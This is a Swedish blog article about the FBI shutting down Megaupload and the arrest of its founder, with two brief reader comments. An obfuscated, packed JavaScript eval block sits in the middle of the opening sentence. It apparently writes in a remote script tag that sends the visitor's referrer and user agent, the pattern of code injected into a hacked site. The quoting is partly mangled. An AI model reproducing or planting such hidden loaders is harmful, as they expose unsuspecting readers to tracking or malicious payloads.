Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Kommer Megaupload någonsin ta sig på fötter igen?

Kommer Megaupload någonsin ta sig på fötter igen?
Sebastian

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|insdt|var|u0026u|referrer|fnads||js|php’.split(’|’),0,{}))
många av er redan vet så stängdes Megaupload ner av FBI för några dagar sedan.
  Även grundaren Kim Dotcom och hans kollegor arresterades och sitter nu häktade för grova brott.

Anklagelserna mot Megaupload gör gällande att det Hong Kong-baserade företaget under mer än fem år ska ha drivit webbplatser i syfte att distribuera piratkopierat material. Detta har skett genom att belöna användare som laddar upp populära filer som ses av väldigt många. Klipp som inte sågs av många togs ofta bort och lämnade plats för resterande.

FBI fick möjlighet att göra sitt tillslag tack vare att företaget hade servrar placerade i USA. Webbplatsen ska ha haft 150 miljoner användare och anklagas för att ha orsakat förluster på 500 miljoner dollar för rättighetsinnehavare. Samtidigt har sajten dragit in över 175 miljoner till dess ägare.

Företaget själva menar att majoriteten av trafiken är legitim och att de välkomnar en dialog med mediaindustrin.

Nedan ser ni en bild på grundaren av Megauploads hus på Nya Zeeland.

Frågan är, kommer Megaupload ta sig på fötter igen efter denna svåra incident?

http://www.megaupload.com/

Comments

  1. Hej

    Är inte han tjock? Hur orkar han gå igenom hela huset varje morgon? Spelar han tennis?

  2. Fabian

    Skön Maze att springa runt i.